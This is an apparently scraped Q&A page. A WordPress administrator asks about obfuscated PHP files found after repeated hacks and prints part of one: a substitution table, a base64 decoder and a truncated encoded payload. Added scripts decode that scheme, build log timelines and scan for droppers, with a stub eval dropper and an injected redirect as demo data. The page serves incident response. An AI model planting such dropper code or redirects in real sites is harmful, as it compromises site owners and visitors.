
Corrupted file on my ftp server in my wordpress site

I'm in charge of a Wordpress website. 1 year ago, the site had been hacked. When someone connected to the site by typing the URL, he was redirected to another "fake" site. I discovered that a line had simply been put in the index.php to redirect to another site. I removed the line and made a restoration of my FTP server. Before that I noticed some suspicious files on the FTP server; I did not create these files, and there was some obscure PHP and JS code, with some random chars.

Recently the site had the same problem, except that there was only a blank page when we connected to the site. I restored the site again. Before that I noticed some suspicious files on the FTP server; I did not create these files, and there was some obscure PHP and JS code in them, with some random chars.

All the files had almost the same date of creation and I had no rights to delete them from the server. I think that the vulnerability comes from here but I can't find any similar case on the internet. Does someone have information about it? I'm just looking for some information now and I don't have access to the site at the moment.

EDIT:

I have this kind of file:

    <?php
    $vHMX55W = Array('1'=>'C', '0'=>'j', '3'=>'U', '2'=>'x', '5'=>'F', '4'=>'s', '7'=>'q', '6'=>'P', '9'=>'T', '8'=>'y', 'A'=>'5', 'C'=>'e', 'B'=>'G', 'E'=>'f', 'D'=>'a', 'G'=>'1', 'F'=>'2', 'I'=>'7', 'H'=>'m', 'K'=>'X', 'J'=>'n', 'M'=>'c', 'L'=>'E', 'O'=>'v', 'N'=>'M', 'Q'=>'i', 'P'=>'Q', 'S'=>'g', 'R'=>'O', 'U'=>'A', 'T'=>'I', 'W'=>'h', 'V'=>'N', 'Y'=>'S', 'X'=>'t', 'Z'=>'6', 'a'=>'3', 'c'=>'Z', 'b'=>'w', 'e'=>'R', 'd'=>'k', 'g'=>'9', 'f'=>'z', 'i'=>'J', 'h'=>'4', 'k'=>'V', 'j'=>'D', 'm'=>'0', 'l'=>'d', 'o'=>'u', 'n'=>'W', 'q'=>'8', 'p'=>'b', 's'=>'l', 'r'=>'Y', 'u'=>'K', 't'=>'H', 'w'=>'r', 'v'=>'L', 'y'=>'p', 'x'=>'o', 'z'=>'B');
    function v9PSABL($vMCS1QU, $vDG7FSU){$v4ZU9QC = ''; for($i=0; $i < strlen($vMCS1QU); $i++){$v4ZU9QC .= isset($vDG7FSU[$vMCS1QU[$i]]) ? $vDG7FSU[$vMCS1QU[$i]] : $vMCS1QU[$i];}
    return base64_decode($v4ZU9QC);}
    $vW073GA = 'DnrxDKVfcKPxi5g9ekinekTyuPyI1SddKGV53sc53s4J3LWPKGV59Lr'.
    'JKYUgT1TOT04S1SddKGV53sc53s4J3dkV9Ge5Km5Le5TJKYUgT1T2N0MoN1hbv0LQRbxiDn'.
    'rxTnkXMteAu1eE3mkYkdkYn8lTk5ePKGWEedgYkm5YeLkLKmc63QlluYdu1K4u1PddKGV53sc53s4JY5'.
    'e335grKmc63slz3de5e5gB9GTJKYUgT1T2N0MoN1hbv0LQRbxiEPyg1SyycQWyMaVsl1SdKmci9Lk9uYduCbxicHg8cn50D1S'.
    'dKmci9Lk9TB5fT1ewcKdS69hSiBcypB3y1SsI1SdiDnrxTKVmMJzOM8SdcHs4ck4JpH5XcYllv1UQvHybc8TyuPxi1K4u1PdiiBc'.
    'ypBkornGsTjmSrn2mcKiEpn50MHgfu1eHDn2sn8lornGsiGmyRbxi1PddcHs4cnAWpn3S6YzolnGEpn50MHgfu1eHDn2spH5XcYd'.
    'I1Sdi1YeHDn2spH5XcYUgTtWolnGEpn50MHgfu1eHDn2spH5XcYdI1Sdi1YeEedsNekVp'.
    'iBXsCkGpTHAWpn3QKYUgT1eHDn2spH5Xc94u1Psg1Ssg1Jmu1PyHlnA0lBsOpQz0lKVmp'.
    'FGEMae8DKzElB5JM8SdlBkhl1duCbxST1USitesCtPS6YzfltiyM5gmrnlfu1'.
    'emcKWmv1UJ6BL+i8dI1SxST1USitesCtPS6YzfltiEMHkbpB50cYSQ6BLSDtisc0GMTQT4T1ipT1T4T1emcKWmu94uT1UST1e'.
    'mcKWmTjmSMae8KaisMB2WrF3xT0bOr9hQv1UQTQbSitesCtPyRbxST1USitesCtPS6Yzflti'.
    'EMHkbpB50cYSQK1T+TQbSTQzlT1T4T1emcKWmu94u1QUST1z8cKeGMHhSi'.
    'tesCtPI1Jmu1HcGpHVmDngoTBsfKFsbu1efltTyTt4uT1z8cKeGMHhSMtiscGgXrKe0D1S'.
    'QvGhxnfLXRkGqnfLXRkGpN1mAKKb2nfUXRkGpN1mAKKb8nfUXV5GpN1'.
    'mAKKb8Vk4bv9kluYWMvQWpN1mAKK2pNYmAKk4bv9slEj5pN1mAKk4bv9slEjipN1mmKk4bv9slEjTGnf'.
    'UXVkmyuK4fEYPOTQbdMae8u94uEPxucJkoraeypFhScJiOpkgxpaVmu1e0pFAmcnAmuPyI1SxST1USi'.
    'BWOMaPS6YzbMHkJKaisMB2WrF3xi8gCutlala2HltUyK1hODYM4i8'.
    'M4P1eE3mkYkdkYn8lTk5ePKmW63GPJKYdI1SxST1USDnrSuBsfKFsbu1expaVmuYduT1UST'.
    't4uT1UST1UST1z8cKeGMHhSiBVOpJespJPI1QUST1zg1QUST1UuT1UST1empFXspJNS6YzsCtz4pFesu1iUTQbSiBVOpJespJPy'.
    'RbxuT1UST1e0pFAmcnAmTjmSiteODFkoMG4bKYUoT1iUTQUoT1exp'.
    'aVmT1hST0hQRbxuT1USTtisltk8pQUdrFgolBkolj4uEPxucJkoraeypFhSrn2mcKiEpn50MHgfu1e0pFAmcn'.
    'AmuPyI1QUST1zbMHkJKFGWlBVxKF54p1SJTa4xvQxyEYVkDYM4T1e0pFAmcnAmv1Udpn5mr'.
    'FWsM8dI1SxST1UScHg8u1eyTjmSNj4SiBdS61z0pakol1Sdpn5mrFWsMG'.
    '42KYdIT1eyu84y1QUST1zI1SxST1UST1UST1eoM8UgTBkhMB2OcB3xTJbQv1Udpn5mrF'.
    'WsMG42Kk4dDkmyRbxST1UST1UST1e0NQUgTBVOlnAmu1eoM8dI'.
    '1QUST1UST1USitiWpHPS6Yz8rnAdujU4T1SdrfTSvYU2uYdI1QUST1UST1USiBVOpJespJPS6Yz'.
    'fltiEMHkbpB50cYSQC8ToiBGWlBVxcKVpNkGpiBslvQigTQbSiBAfn8'

Does someone know what it is?
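An added example (mine, not code from the post): a Python re-implementation of the decoder the posted file carries, `v9PSABL()`, so you can see what the obfuscation does without executing the PHP. It is a one-to-one character substitution followed by base64: every alphanumeric character of the blob is swapped through the table, `+`, `/` and `=` pass through unchanged, and the result is base64-decoded (and presumably executed by the part of the file that was cut off). The character table is copied from the post; the encoded sample fed to it below is constructed from the text `echo 1;`, because the payload in the post ends mid-string.

```python
import base64
import re

# The Array(...) line from the file in the question, copied verbatim.
PHP_TABLE_LINE = r"""$vHMX55W = Array('1'=>'C', '0'=>'j', '3'=>'U', '2'=>'x', '5'=>'F', '4'=>'s', '7'=>'q', '6'=>'P', '9'=>'T', '8'=>'y', 'A'=>'5', 'C'=>'e', 'B'=>'G', 'E'=>'f', 'D'=>'a', 'G'=>'1', 'F'=>'2', 'I'=>'7', 'H'=>'m', 'K'=>'X', 'J'=>'n', 'M'=>'c', 'L'=>'E', 'O'=>'v', 'N'=>'M', 'Q'=>'i', 'P'=>'Q', 'S'=>'g', 'R'=>'O', 'U'=>'A', 'T'=>'I', 'W'=>'h', 'V'=>'N', 'Y'=>'S', 'X'=>'t', 'Z'=>'6', 'a'=>'3', 'c'=>'Z', 'b'=>'w', 'e'=>'R', 'd'=>'k', 'g'=>'9', 'f'=>'z', 'i'=>'J', 'h'=>'4', 'k'=>'V', 'j'=>'D', 'm'=>'0', 'l'=>'d', 'o'=>'u', 'n'=>'W', 'q'=>'8', 'p'=>'b', 's'=>'l', 'r'=>'Y', 'u'=>'K', 't'=>'H', 'w'=>'r', 'v'=>'L', 'y'=>'p', 'x'=>'o', 'z'=>'B');"""


def extract_charmap(php_source):
    """Pull the 'key'=>'value' pairs out of a substitution-table line."""
    return dict(re.findall(r"'(.)'\s*=>\s*'(.)'", php_source))


CHARMAP = extract_charmap(PHP_TABLE_LINE)


def join_php_concat(php_source):
    """Glue the 'abc'. 'def'. pieces of a $var = '...'.'...'; statement into one string."""
    return "".join(re.findall(r"'([^']*)'", php_source))


def decode_blob(blob, charmap=CHARMAP):
    """Reproduce v9PSABL(): map each character through the table, leave anything
    not in it ('+', '/', '=') alone, then base64-decode.
    Posted samples are often cut off, so an incomplete trailing 4-character
    base64 group is dropped instead of raising a padding error."""
    translated = "".join(charmap.get(ch, ch) for ch in blob)
    translated = translated[: len(translated) - len(translated) % 4]
    return base64.b64decode(translated)


def encode_blob(payload, charmap=CHARMAP):
    """Inverse of decode_blob; used only to build a known-good test sample."""
    inverse = {v: k for k, v in charmap.items()}
    return "".join(inverse.get(ch, ch) for ch in base64.b64encode(payload).decode())


# Constructed sample: b"echo 1;" pushed through the inverse table (not taken from the post).
SAMPLE_ENCODED = "cnVxp8U2Rb=="

if __name__ == "__main__":
    print(len(CHARMAP), "table entries; table is a permutation of [0-9A-Za-z]:",
          sorted(CHARMAP) == sorted(CHARMAP.values()))
    print(decode_blob(SAMPLE_ENCODED))
```

To run it against the real file, paste the whole `$vW073GA = '...'.` statement into `join_php_concat()` and hand the result to `decode_blob()`; because the post is cut off you will only get a prefix of the payload, which is usually enough to recognise the family. Do this on a workstation, never on the web server, and do not execute the decoded PHP.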

This is incredibly broad. There are literally millions of possible vectors for attack on a website. The fact that you were attacked does not in itself suggest any one of those possibilities over any other.

Since you have a timestamp when the attack occurred, check server logs at that time for clues about the vector. Was there SFTP access at that time? Perhaps a legitimate user's password is compromised. Was there HTTP access at that time? Perhaps a plugin has a vulnerability and needs to be disabled or upgraded.

An attacker only needs one vulnerability to gain access to the site. It may be obvious which it was (e.g., if you see SFTP activity from a known user account), or it may take extensive research to figure out what happened and how.
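The log check this answer describes, as an added example that is not part of the original answer: it takes the creation time of one of the unexplained files as a pivot, pulls everything from the web-server and FTP logs within ten minutes of it, and flags the entries worth a second look (a PHP file under `wp-content/uploads`, a POST to a script that is not a normal WordPress entry point, an FTP login, a PHP upload over FTP). The log lines, addresses, user name and file name are constructed for the demonstration; Apache combined format and vsftpd's log format are assumed, and the FTP timestamps are treated as UTC.

```python
import re
from datetime import datetime, timedelta, timezone

# Constructed sample logs standing in for the poster's server (not real data).
ACCESS_LOG = """\
203.0.113.7 - - [02/Mar/2020:00:58:00 +0000] "GET /?p=1 HTTP/1.1" 200 7300 "-" "Mozilla/5.0"
203.0.113.7 - - [02/Mar/2020:01:12:03 +0000] "GET /wp-login.php HTTP/1.1" 200 2450 "-" "Mozilla/5.0"
203.0.113.7 - - [02/Mar/2020:01:12:09 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
203.0.113.7 - - [02/Mar/2020:01:14:02 +0000] "POST /wp-content/uploads/2020/03/x7a.php HTTP/1.1" 200 18 "-" "Mozilla/5.0"
198.51.100.3 - - [02/Mar/2020:09:30:15 +0000] "GET /index.php HTTP/1.1" 200 9100 "-" "Mozilla/5.0"
"""
# vsftpd-style lines; their timestamps are assumed to be UTC in this example.
FTP_LOG = """\
Sun Mar  1 22:05:11 2020 [pid 2] [wpuser] OK LOGIN: Client "192.0.2.44"
Mon Mar  2 01:10:55 2020 [pid 2] [wpuser] OK LOGIN: Client "203.0.113.7"
Mon Mar  2 01:13:50 2020 [pid 2] [wpuser] OK UPLOAD: Client "203.0.113.7", "/var/www/html/wp-content/uploads/2020/03/x7a.php", 3189 bytes, 12.00Kbyte/sec
"""

ACCESS_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')
FTP_RE = re.compile(r'^(\w{3} \w{3}\s+\d+ \d\d:\d\d:\d\d \d{4}) \[pid \d+\] \[(\w+)\] '
                    r'(OK|FAIL) (\w+): Client "([\d.]+)"(?:, "([^"]+)")?')

# Paths that deserve a second look; extend for your own layout.
HTTP_FLAGS = [
    (r"^/wp-content/uploads/.*\.php$", "PHP file under uploads (WordPress never writes PHP there)"),
]
# Scripts that legitimately receive POSTs on a stock install.
NORMAL_POST_TARGETS = r"^/(wp-login\.php|wp-admin/|xmlrpc\.php)"


def parse_access(text):
    """Yield one event per Apache combined-format line, with a flag where it looks off."""
    for line in text.splitlines():
        m = ACCESS_RE.match(line)
        if not m:
            continue
        ip, ts, method, path, status = m.groups()
        when = datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z")
        bare = path.split("?")[0]
        flag = next((why for pat, why in HTTP_FLAGS if re.search(pat, bare)), None)
        if flag is None and method == "POST" and not re.match(NORMAL_POST_TARGETS, bare):
            flag = "POST to an unexpected script"
        yield {"time": when, "source": "http", "actor": ip,
               "detail": f"{method} {path} -> {status}", "flag": flag}


def parse_ftp(text):
    """Yield one event per vsftpd line; logins and PHP uploads are always flagged."""
    for line in text.splitlines():
        m = FTP_RE.match(line)
        if not m:
            continue
        ts, user, ok, action, ip, target = m.groups()
        when = datetime.strptime(" ".join(ts.split()), "%a %b %d %H:%M:%S %Y")
        when = when.replace(tzinfo=timezone.utc)  # assumption: server logs in UTC
        flag = None
        if action == "LOGIN" and ok == "OK":
            flag = "FTP login (confirm this user/IP was expected)"
        elif action == "UPLOAD" and target and target.endswith(".php"):
            flag = "PHP uploaded over FTP"
        yield {"time": when, "source": "ftp", "actor": f"{user}@{ip}",
               "detail": f"{ok} {action} {target or ''}".strip(), "flag": flag}


def timeline(access_text, ftp_text, pivot, window=timedelta(minutes=10)):
    """Merge both logs and keep only events within +/- window of the pivot time."""
    events = [e for e in (*parse_access(access_text), *parse_ftp(ftp_text))
              if abs(e["time"] - pivot) <= window]
    return sorted(events, key=lambda e: e["time"])


# Pivot: creation time of one of the unexplained files (constructed here; on a
# real box take it from `stat` on the file).
PIVOT = datetime(2020, 3, 2, 1, 13, 50, tzinfo=timezone.utc)


def demo_timeline():
    return timeline(ACCESS_LOG, FTP_LOG, PIVOT)


if __name__ == "__main__":
    for e in demo_timeline():
        mark = "  <-- " + e["flag"] if e["flag"] else ""
        print(f'{e["time"]:%Y-%m-%d %H:%M:%S} {e["source"]:4} {e["actor"]:24} {e["detail"]}{mark}')
```

On the constructed data the ordering tells the story the answer hints at: an FTP login from a known account, the PHP file arriving over FTP at the pivot time, and an HTTP POST to that file a few seconds later. That points at a compromised FTP credential rather than a plugin bug; with real logs the pattern may differ, but the method is the same: pivot on the file timestamp, merge every log source, and look at what happened just before it.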

It's very simple: you got hacked.

Forget trying to deobfuscate the php files; they may tell you what the files do, but they won't tell you how the files got there. Delete them all.

And you won't find the exploit vector unless you carefully parse server logs and check all your plugins and theme for vulnerabilities. And the vector could have been malware on your own PC/mac that stole credentials.

The fix is simple: carefully clean the site and the hosting account by following FAQ My site was hacked - WordPress Codex. Scan your own PC/Mac and any machine that was used to access WordPress admin and the hosting account.

If this is your own server, you need to harden it, too. Try searching https://serverfault.com/ for information on your OS and how to secure and harden it.

And take a look at the recommended security measures for WordPress itself in Hardening WordPress - WordPress Codex and Brute Force Attacks - WordPress Codex
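A first pass at the "carefully clean the site" step, as an added example that is not taken from this answer or the linked Codex pages: it walks a WordPress tree and lists PHP files that sit under `wp-content/uploads`, files that combine `base64_decode` with `eval`/`create_function` or a single-character substitution table like the one in the question, and a redirect added to the top-level `index.php`. The demo tree it builds in a temporary directory, including the dropper-style file, is constructed for the example; the file names and contents are not from the poster's server.

```python
import re
import tempfile
from pathlib import Path

# Markers seen in a lot of PHP droppers, including the sample in the question.
MARKERS = [
    (re.compile(rb"base64_decode\s*\("), "base64_decode"),
    (re.compile(rb"\beval\s*\("), "eval"),
    (re.compile(rb"\bcreate_function\s*\("), "create_function"),
    (re.compile(rb"\$_(?:GET|POST|REQUEST|COOKIE)\s*\["), "reads request input"),
    (re.compile(rb"\$\w{6,}\s*=\s*Array\s*\(\s*'.'\s*=>\s*'.'"), "single-char substitution table"),
]
PHP_SUFFIXES = {".php", ".phtml", ".php5"}
REDIRECT_RE = re.compile(rb"header\s*\(\s*['\"]Location")


def scan_tree(root):
    """Return sorted (relative path, [reasons]) for files that need a look."""
    root = Path(root)
    findings = []
    for path in root.rglob("*"):
        if not path.is_file():
            continue
        rel = path.relative_to(root).as_posix()
        reasons = []
        is_php = path.suffix.lower() in PHP_SUFFIXES
        if is_php and rel.startswith("wp-content/uploads/"):
            reasons.append("PHP under wp-content/uploads")
        if is_php or path.suffix.lower() == ".js":
            data = path.read_bytes()
            hits = [name for pat, name in MARKERS if pat.search(data)]
            # base64_decode alone is common in clean code; it is the combination
            # with an executor or a substitution table that marks a dropper.
            if "base64_decode" in hits and (
                {"eval", "create_function"} & set(hits)
                or "single-char substitution table" in hits
            ):
                reasons.append("obfuscated code: " + ", ".join(hits))
            if rel == "index.php" and REDIRECT_RE.search(data):
                reasons.append("redirect injected into index.php")
        if reasons:
            findings.append((rel, reasons))
    return sorted(findings)


# Constructed demo tree: one injected index.php, one dropper under uploads,
# a clean theme file and a plugin that legitimately uses base64_decode.
DEMO_FILES = {
    "index.php": (b"<?php\nheader(\"Location: http://example.invalid/\"); exit;\n"
                  b"define('WP_USE_THEMES', true);\nrequire __DIR__ . '/wp-blog-header.php';\n"),
    "wp-content/themes/mytheme/functions.php": b"<?php\nadd_action('init', 'mytheme_setup');\n",
    "wp-content/plugins/gallery/gallery.php":
        b"<?php\n$png = base64_decode($encoded_icon); // decoding an embedded image is fine on its own\n",
    "wp-content/uploads/2020/03/x7a.php": (
        b"<?php\n$vABC123 = Array('1'=>'C', '0'=>'j');\n"
        b"function d($s,$m){$o='';for($i=0;$i<strlen($s);$i++){$o.=isset($m[$s[$i]])?$m[$s[$i]]:$s[$i];}"
        b"return base64_decode($o);}\neval(d('AAAA', $vABC123));\n"),
    "wp-content/uploads/2020/03/photo.jpg": b"\xff\xd8\xff",
}


def build_demo_tree():
    root = Path(tempfile.mkdtemp(prefix="wp-triage-"))
    for rel, data in DEMO_FILES.items():
        p = root / rel
        p.parent.mkdir(parents=True, exist_ok=True)
        p.write_bytes(data)
    return root


if __name__ == "__main__":
    for rel, reasons in scan_tree(build_demo_tree()):
        print(f"{rel}: {'; '.join(reasons)}")
```

On a real install run `scan_tree()` against the document root, then confirm core files with `wp core verify-checksums` (WP-CLI) and pull everything modified in the same window with `find <docroot> -newermt '<start>' ! -newermt '<end>'`. The scanner is a heuristic: a dropper that uses none of these markers will pass it, so a clean result is a reason to keep looking, not proof the site is clean, and, as the answer says, the files themselves will not tell you how they got there.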

When you say you have no right to delete them, aren't you managing the site? If you do not have full administrative rights, you should contact whoever does and explain the situation so that they may handle it immediately, or at least enable you to do so.

Do you know how the site was hacked the first and second time? Obviously there is a vulnerability that needs to be addressed.

What kind of files were left behind? Can you examine/explain the contents any further than finding 'obscure' code?

The technical posts on this site follow the CC BY-SA 4.0 license. If you need to reprint, please indicate the site URL or the original address. Any question, please contact: yoyou2525@163.com.

粤ICP备18138465号  © 2020-2024 STACKOOM.COM